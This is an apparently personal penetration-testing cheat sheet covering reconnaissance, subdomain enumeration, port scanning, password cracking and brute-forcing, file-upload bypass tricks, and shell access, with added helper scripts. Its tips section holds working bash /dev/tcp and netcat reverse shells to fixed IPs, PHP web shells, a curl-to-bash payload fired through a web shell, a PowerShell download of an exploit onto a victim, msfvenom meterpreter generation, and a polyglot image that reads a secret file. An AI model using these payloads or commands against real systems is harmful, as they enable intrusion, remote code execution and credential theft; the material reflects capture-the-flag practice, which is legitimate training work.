Notes

Recon phase

  • Large scope

 - Review the company's latest [acquisitions](https://www.crunchbase.com/); acquired brands bring their own domains into scope

 - Find related domains by registrant (reverse WHOIS: [viewdns](https://viewdns.info/reversewhois/))

 - Go to medium scope for each domain found

On a small domain

  • subfinder -d domainname.com -silent | httpx -silent | gau | uro | gf lfi | tee save-file.txt   // subdomains -> live hosts -> archived URLs -> dedupe params -> LFI-looking params, saved to a file

DnsDump

Subdomain Enum

  • amass enum -d clicktheclapbutton50timesplz.com

  • sublist3r -d techyrick.com -o file.txt

  • subfinder -d domain.com -all -silent

  • assetfinder --subs-only domain.com

  • gobuster vhost -u http://thetoppers.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain   // virtual-host brute force (names that are not in DNS)

  • echo domain.com | waybackurls | unfurl -u domains

  • gau --subs example.com | unfurl -u domains
  • crt.sh   // certificate transparency: https://crt.sh/?q=%25.domain.com
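The tools above emit a mix of bare hostnames (subfinder, amass, crt.sh) and full URLs (waybackurls, gau), so their outputs have to be normalised before they go into httpx. The script below is an added example, not part of the original notes: it does the `unfurl -u domains | sort -u` step in plain awk and also drops hosts outside the root domain, since gau and wayback drag in third-party hosts. The root domain example.com and the sample lines are constructed placeholders.

```bash
#!/usr/bin/env bash
# Added example (not from the original notes): merge the output of several
# enumeration tools into one de-duplicated, in-scope host list.
# Root domain example.com and the sample lines below are placeholders.

# hosts_from_urls <root-domain> : reads URLs or hostnames on stdin,
# prints unique lowercase hostnames that are the root or a subdomain of it.
hosts_from_urls() {
  awk -v root="$1" '
    {
      h = tolower($0)
      sub(/^[[:space:]]+/, "", h); sub(/[[:space:]]+$/, "", h)
      if (h == "") next
      sub(/^[a-z][a-z0-9+.-]*:\/\//, "", h)   # scheme   (https://)
      sub(/^[^@\/]*@/, "", h)                 # userinfo (user:pass@)
      sub(/[\/?#].*$/, "", h)                 # path, query, fragment
      sub(/:[0-9]+$/, "", h)                  # port
      sub(/\.$/, "", h)                       # trailing dot (dig/amass style)
      sub(/^\*\./, "", h)                     # wildcard entries from crt.sh
      n = length(root)
      # keep the root itself, or anything that ends in ".<root>"
      if (h == root || substr(h, length(h) - n, n + 1) == "." root) print h
    }' | sort -u
}

# Constructed sample: what `cat subfinder.txt gau.txt crtsh.txt` might hold.
SAMPLE_INPUT='https://API.example.com/v1/users?id=1
api.example.com
http://admin:pw@dev.example.com:8443/
*.example.com
example.com.
https://cdn.example.net/x
  stage.example.com  
example.com'

main() {
  printf '%s\n' "$SAMPLE_INPUT" | hosts_from_urls example.com
  # real use: cat subfinder.txt gau.txt crtsh.txt | hosts_from_urls example.com | httpx -silent
}
main
```

Scope filtering is done by suffix comparison rather than a regex built from the root domain, so dots in the domain name are not treated as wildcards and a host like notexample.com is rejected.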

Technologies

Content Discovery

  • crawley -all -cookie "security=low; PHPSESSID=mlhjkmo9l7slsf8g548pnd4pjn" http://localhost/dvwa > io.txt

  • ffuf -u http://URL/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt -mc 200,302

  • wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404,302,301 http://10.129.206.31/FUZZ.php

  • gobuster dir -u http://url/ -w <wordlist> -x php,txt,js -k   // -k skips TLS certificate verification (https targets)

  • dirsearch

Parameters

sub-domain_takeover

  • subzy

     ./subzy run --targets list.txt

  • https://github.com/EdOverflow/can-i-take-over-xyz   // which services are actually takeover-able, with the fingerprint to look for behind a dangling CNAME

==========================================AutomationAndCollected-Command==========================================

Curl

  • curl -X OPTIONS -I http://target/   // the Allow: header lists the enabled HTTP methods

ffuf

  • ffuf -u http://URL/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt -mc 200,302
  • ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://10.10.11.23 -H "Host: FUZZ.permx.htb" -mc 200 -s   // vhost fuzzing; add -fs <size> to hide the default-vhost response

Wfuzz

gobuster [subdomain]

  • gobuster vhost -u http://thetoppers.htb -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt --append-domain   // virtual-host brute force

amass

  • amass enum -d clicktheclapbutton50timesplz.com

sublist3r

  • sublist3r -d techyrick.com -o file.txt
  • sublist3r -d techyrick.com -b

nslookup

  • $ nslookup example.com
  • $ nslookup <ip>                // reverse (PTR) lookup
  • $ nslookup <ip> <dns-server>   // same, but asking a specific server (e.g. the target's own DNS)

dig

  • dig axfr cronos.htb @10.10.10.13   // zone transfer against the target's name server
  • dig -x 10.10.10.13 @10.10.10.13    // reverse (PTR) lookup

zip2john

  • zip2john your_file.zip > zip.hash

Whatweb

nmap

  • nmap -sn 192.168.1.0/24   // host discovery (ping sweep), no port scan
  • nmap --top-ports 1000 $ip
  • nmap -iL list.txt   // targets from a file
  • nmap -A -T4 cloudflare.co
  • nmap -sV localhost
  • nmap -p- -Pn -vv -T4 -n $ip   // all ports, skip host discovery, no DNS resolution
  • nmap --top-ports 100 -A -sV -T4 $ip
  • sudo nmap -sSVC -p-10000 $ip   // SYN scan + version detection + default scripts, ports 1-10000
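The usual two-stage workflow is a fast full-port sweep first (-p- with -oG), then -sV -sC only on the ports that came back open. The helper below is an added example, not part of the original notes: it pulls the open TCP ports out of grepable nmap output so the second stage can be built from it. The -oG sample is constructed and 10.10.10.13 is a placeholder.

```bash
#!/usr/bin/env bash
# Added example (not from the original notes): extract open ports from
# `nmap -p- -oG full.gnmap` output to feed a targeted -sV -sC scan.
# The -oG sample below is constructed; 10.10.10.13 is a placeholder.

# open_ports : reads nmap -oG output on stdin, prints e.g. "22,53,80"
open_ports() {
  grep '^Host:' \
    | grep -o '[0-9][0-9]*/open/tcp' \
    | cut -d/ -f1 \
    | sort -n -u \
    | paste -sd, -
}

# Constructed stage-1 output, as nmap -p- -oG full.gnmap would write it
# (8080 is closed and must not appear in the result).
SAMPLE_GNMAP='# Nmap 7.94 scan initiated
Host: 10.10.10.13 ()   Status: Up
Host: 10.10.10.13 ()   Ports: 22/open/tcp//ssh///, 53/open/tcp//domain///, 80/open/tcp//http///, 8080/closed/tcp//http-proxy///   Ignored State: filtered (65531)
# Nmap done'

# stage2_cmd <ip> <gnmap-file> : prints the follow-up scan (printed, not run,
# so the script works offline; pipe it to sh to run it for real)
stage2_cmd() {
  local ip="$1" gnmap="$2"
  printf 'nmap -sV -sC -Pn -p %s %s\n' "$(open_ports < "$gnmap")" "$ip"
}

main() {
  tmp=$(mktemp)
  printf '%s\n' "$SAMPLE_GNMAP" > "$tmp"
  echo "open ports: $(open_ports < "$tmp")"
  stage2_cmd 10.10.10.13 "$tmp"
  rm -f "$tmp"
}
main
```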

rustscan (fast port scanner that hands the open ports to nmap)

  • rustscan -a 10.129.184.36 --ulimit 5000 -- -A   // everything after -- is passed to nmap

tcpdump

  • tcpdump -i tun0 port 1389   // capture traffic on port 1389 on the VPN interface

bettercap

  • sudo bettercap
  • net.probe on
  • net.show

waybackurls

  • cat program.txt | waybackurls >> urls.txt //For target scope

Impacket SMB server (serve files to a Windows target)

  • sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py kali .   // share "kali" = current directory; add -smb2support for clients that require SMB2
  • copy \\10.21.28.143\kali\reverse.exe C:\PrivEsc\reverse.exe   // on the Windows side

nuclei

  • cat program.txt | nuclei

password

  • mkpasswd -m sha-512 Password1234   // sha-512 crypt hash, e.g. for a user line in a writable /etc/passwd or /etc/shadow

John the Ripper

  • john --wordlist=/usr/share/wordlists/rockyou.txt john.txt
  • john john.txt --show   // print the cracked passwords

Docker

  • sudo docker run --rm -it <image>

Metasploit

  • search type:exploit name:smb platform:windows

searchsploit

searchsploit -m <path/file>   // copy the exploit into the current directory

Download a file onto the victim (Windows)

powershell "(new-object System.Net.WebClient).DownloadFile('http://10.10.14.105:8000/MS10-059.exe', 'MS10-059.exe')"

PayLoad

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<attacker-ip> LPORT=<port> -f exe > writeup.exe

hydra

hydra -l none -P rockyou.txt 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password" -t 64 -V   // path:POST body (^PASS^ is substituted):string that marks a failed login

crackmapexec

  • crackmapexec smb solarlab.htb -u blake -p pass.txt

wpscan

  • wpscan --url example.com

HttpX

  • httpx -l subs.txt -ssc -td -title -fhr -location -pa   // -l = list of hosts from the subdomain enum

For IIS targets use shortscan (8.3 short-filename enumeration)

Collect IPs

  • shodan.io

  • censys, fofa, zoomeye and similar search engines

File permissions

  • chmod a+rx filename

  • sudo chown www-data: /path/to/file

file_uploadbypass

========================

  • Upload an .htaccess that maps a harmless-looking extension to PHP (Apache only), then upload shell.tez

Content-Disposition: form-data; name="avatar"; filename=".htaccess"
Content-Type: text/plain

AddType application/x-httpd-php .tez

========================

  • Spoof the Content-Type of the file part (bypasses checks that trust the client-supplied type)

Content-Type: image/jpeg

========================

  • Polyglot: a real image with PHP in its metadata comment, saved under a .php name (bypasses magic-byte checks)

exiftool -Comment="<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>" ink.png -o polyglot.php

========================

  • Null byte in the filename: the check sees .jpg, the write truncates at %00 and saves test.php (old PHP / C-string handling)

test.php%00.jpg

========================

  • Race condition: the file is written before it is validated, so request it in the window before it gets deleted

Lab: Web shell upload via race condition

========================
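The polyglot trick above relies on one fact: a validator that only inspects the first bytes of the upload accepts anything that begins with a real image header, and PHP ignores whatever precedes the <?php tag. The script below is an added example, not part of the original notes or the lab: it builds the same kind of file without exiftool, using a 6-byte GIF89a header instead of a PNG (no chunk structure needed), and shows a naive magic-byte check passing it. File names and the secret path are placeholders taken from the exiftool line above.

```bash
#!/usr/bin/env bash
# Added example (not from the original notes): image/PHP polyglot without exiftool.
# Paths and the target URL in the comment are placeholders.

# make_polyglot <out-file> <php-code> : GIF magic followed by PHP
make_polyglot() {
  { printf 'GIF89a'; printf '%s' "$2"; } > "$1"
}

# looks_like_image <file> : what a naive server-side magic-byte check does
looks_like_image() {
  [ "$(head -c 6 "$1")" = "GIF89a" ]
}

# has_php_tag <file> : what that check misses
has_php_tag() {
  grep -q '<?php' "$1"
}

main() {
  out=$(mktemp)
  make_polyglot "$out" "<?php echo 'START ' . file_get_contents('/home/carlos/secret') . ' END'; ?>"
  looks_like_image "$out" && echo "passes a magic-byte check"
  has_php_tag "$out"      && echo "still contains a PHP tag"
  # upload it as polyglot.php with a spoofed part type (curl -F ";type=" sets
  # the part's Content-Type), then request it from the upload directory:
  #   curl -F "avatar=@$out;filename=polyglot.php;type=image/jpeg" http://site.htb/my-account/avatar
  rm -f "$out"
}
main
```

Checking the magic bytes is therefore not a defence on its own; the server also has to control the stored extension and keep uploads out of any path the PHP handler serves.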

==========================================NOTE&TIPS==========================================

  • Subdomain naming to try ==> info, api, dev, admin, stage, ...

  • hosts file on Windows ==> C:\Windows\System32\drivers\etc\hosts   (there is no passwd file there; local accounts live in the SAM)

  • ssh on Windows ==> C:\Users\YourUsername\.ssh

  • Shell upgrade (TTY) ==> python3 -c 'import pty;pty.spawn("/bin/bash")'

  • Shell upgrade (TTY) ==> script /dev/null -c bash

  • shell.sh ==> bash -c 'bash -i >& /dev/tcp/10.10.16.49/5555 0>&1'

  • shell.php ==> <?php system($_GET["cmd"]); ?>

  • shell.php ==> <?php echo shell_exec($_GET['e'].' 2>&1'); ?>   // 2>&1 so errors come back too

  • shell ==> nc -e /bin/bash 10.10.10.10 5555   // needs an nc build that has -e

  • shell.sh ==>

    #!/bin/bash

    bash -i >& /dev/tcp/10.21.28.143/5555 0>&1

  • THEN ==> serve shell.sh (python3 -m http.server 8000), listen (nc -lvnp 5555) and trigger it through the web shell: http://site.htb/shell.php?cmd=curl%20http://<attacker-ip>:8000/shell.sh%7Cbash
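The command passed through ?cmd= has to be percent-encoded: an unencoded & ends the parameter early, and a bare | or space may be rejected or mangled by a proxy in front of the target. The helper below is an added example, not part of the original notes: a pure-shell urlencode plus a small builder for the web-shell URL. The shell URL and the attacker IP are placeholders.

```bash
#!/usr/bin/env bash
# Added example (not from the original notes): build the ?cmd= URL for the
# PHP web shell without breaking the query string.
# http://site.htb/shell.php and 10.10.16.49 are placeholders.

# urlencode <string> : percent-encode everything except RFC 3986 unreserved
# characters (A-Z a-z 0-9 - . _ ~); works byte-wise via od, so it is POSIX sh
urlencode() {
  printf '%s' "$1" | od -An -v -tu1 | awk '
    {
      for (i = 1; i <= NF; i++) {
        c = $i + 0
        if ((c >= 48 && c <= 57) || (c >= 65 && c <= 90) ||
            (c >= 97 && c <= 122) || c == 45 || c == 46 || c == 95 || c == 126)
          printf "%c", c
        else
          printf "%%%02X", c
      }
    }'
}

# webshell_url <shell-url> <param> <command> : e.g. http://site.htb/shell.php cmd id
webshell_url() {
  printf '%s?%s=%s' "$1" "$2" "$(urlencode "$3")"
}

main() {
  # attacker side first: python3 -m http.server 8000   and   nc -lvnp 5555
  webshell_url http://site.htb/shell.php cmd 'curl http://10.10.16.49:8000/shell.sh|bash'
  echo
  # fire it with: curl -s "$(webshell_url http://site.htb/shell.php cmd 'id')"
}
main
```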


